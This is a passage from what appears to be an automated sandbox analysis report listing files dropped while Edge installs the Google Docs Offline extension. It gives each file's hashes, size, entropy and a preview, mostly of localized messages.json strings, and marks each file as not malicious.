SSDEEP:	12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
MD5:	BFAEFEFF32813DF91C56B71B79EC2AF4
SHA1:	F8EDA2B632610972B581724D6B2F9782AC37377B
SHA-256:	AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
SHA-512:	971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\sr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	4.569671329405572
Encrypted:	false
SSDEEP:	24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
MD5:	7F5F8933D2D078618496C67526A2B066
SHA1:	B7050E3EFA4D39548577CF47CB119FA0E246B7A4
SHA-256:	4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
SHA-512:	0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\sv\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	884
Entropy (8bit):	4.627108704340797
Encrypted:	false
SSDEEP:	24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
MD5:	90D8FB448CE9C0B9BA3D07FB8DE6D7EE
SHA1:	D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
SHA-256:	64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
SHA-512:	6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
Malicious:	false
Preview:	{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\sw\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	980
Entropy (8bit):	4.50673686618174
Encrypted:	false
SSDEEP:	12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
MD5:	D0579209686889E079D87C23817EDDD5
SHA1:	C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
SHA-256:	0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
SHA-512:	D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
Malicious:	false
Preview:	{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\ta\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1941
Entropy (8bit):	4.132139619026436
Encrypted:	false
SSDEEP:	24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
MD5:	DCC0D1725AEAEAAF1690EF8053529601
SHA1:	BB9D31859469760AC93E84B70B57909DCC02EA65
SHA-256:	6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
SHA-512:	6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\te\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1969
Entropy (8bit):	4.327258153043599
Encrypted:	false
SSDEEP:	48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
MD5:	385E65EF723F1C4018EEE6E4E56BC03F
SHA1:	0CEA195638A403FD99BAEF88A360BD746C21DF42
SHA-256:	026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
SHA-512:	E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\th\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1674
Entropy (8bit):	4.343724179386811
Encrypted:	false
SSDEEP:	48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
MD5:	64077E3D186E585A8BEA86FF415AA19D
SHA1:	73A861AC810DABB4CE63AD052E6E1834F8CA0E65
SHA-256:	D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
SHA-512:	56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\tr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1063
Entropy (8bit):	4.853399816115876
Encrypted:	false
SSDEEP:	24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
MD5:	76B59AAACC7B469792694CF3855D3F4C
SHA1:	7C04A2C1C808FA57057A4CCEEE66855251A3C231
SHA-256:	B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
SHA-512:	2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
Malicious:	false
Preview:	{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\uk\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1333
Entropy (8bit):	4.686760246306605
Encrypted:	false
SSDEEP:	24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
MD5:	970963C25C2CEF16BB6F60952E103105
SHA1:	BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
SHA-256:	9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
SHA-512:	1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
Malicious:	false
Preview:	{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\ur\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1263
Entropy (8bit):	4.861856182762435
Encrypted:	false
SSDEEP:	24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
MD5:	8B4DF6A9281333341C939C244DDB7648
SHA1:	382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
SHA-256:	5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
SHA-512:	FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
Malicious:	false
Preview:	{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\vi\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1074
Entropy (8bit):	5.062722522759407
Encrypted:	false
SSDEEP:	24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
MD5:	773A3B9E708D052D6CBAA6D55C8A5438
SHA1:	5617235844595D5C73961A2C0A4AC66D8EA5F90F
SHA-256:	597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
SHA-512:	E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
Malicious:	false
Preview:	{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\zh_CN\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	879
Entropy (8bit):	5.7905809868505544
Encrypted:	false
SSDEEP:	12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
MD5:	3E76788E17E62FB49FB5ED5F4E7A3DCE
SHA1:	6904FFA0D13D45496F126E58C886C35366EFCC11
SHA-256:	E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
SHA-512:	F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\zh_HK\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1205
Entropy (8bit):	4.50367724745418
Encrypted:	false
SSDEEP:	24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
MD5:	524E1B2A370D0E71342D05DDE3D3E774
SHA1:	60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
SHA-256:	30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
SHA-512:	D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
Malicious:	false
Preview:	{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\zh_TW\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	843
Entropy (8bit):	5.76581227215314
Encrypted:	false
SSDEEP:	12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
MD5:	0E60627ACFD18F44D4DF469D8DCE6D30
SHA1:	2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
SHA-256:	F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
SHA-512:	6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\zu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	912
Entropy (8bit):	4.65963951143349
Encrypted:	false
SSDEEP:	24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
MD5:	71F916A64F98B6D1B5D1F62D297FDEC1
SHA1:	9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
SHA-256:	EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
SHA-512:	30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
Malicious:	false
Preview:	{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_metadata\verified_contents.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	11406
Entropy (8bit):	5.745845607168024
Encrypted:	false
SSDEEP:	192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
MD5:	0A68C9539A188B8BB4F9573F2F2321D6
SHA1:	E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
SHA-256:	39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
SHA-512:	13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
Malicious:	false
Preview:	[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\dasherSettingSchema.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	854
Entropy (8bit):	4.284628987131403
Encrypted:	false
SSDEEP:	12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
MD5:	4EC1DF2DA46182103D2FFC3B92D20CA5
SHA1:	FB9D1BA3710CF31A87165317C6EDC110E98994CE
SHA-256:	6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
SHA-512:	939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
Malicious:	false
Preview:	{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\manifest.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2525
Entropy (8bit):	5.417954053901
Encrypted:	false
SSDEEP:	24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
MD5:	5E425DC36364927B1348F6C48B68C948
SHA1:	9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
SHA-256:	32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
SHA-512:	C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
Malicious:	false
Preview:	{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/", "https://drive.google.com/", "https://drive-autopush.corp.google.com/", "https://drive-daily-0.corp.google.com/", "https://drive-daily-1.corp.google.com/", "https://drive-daily-2.corp.google.com/", "https://drive-daily-3.corp.google.com/", "https://drive-daily-4.corp.google.com/", "https://drive-daily-5.corp.google.com/", "https://drive-daily-6.corp.google.com/", "https://drive-preprod.corp.google.com/", "https://drive-staging.corp.google.com/" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\offscreendocument.html

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	97
Entropy (8bit):	4.862433271815736
Encrypted:	false
SSDEEP:	3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
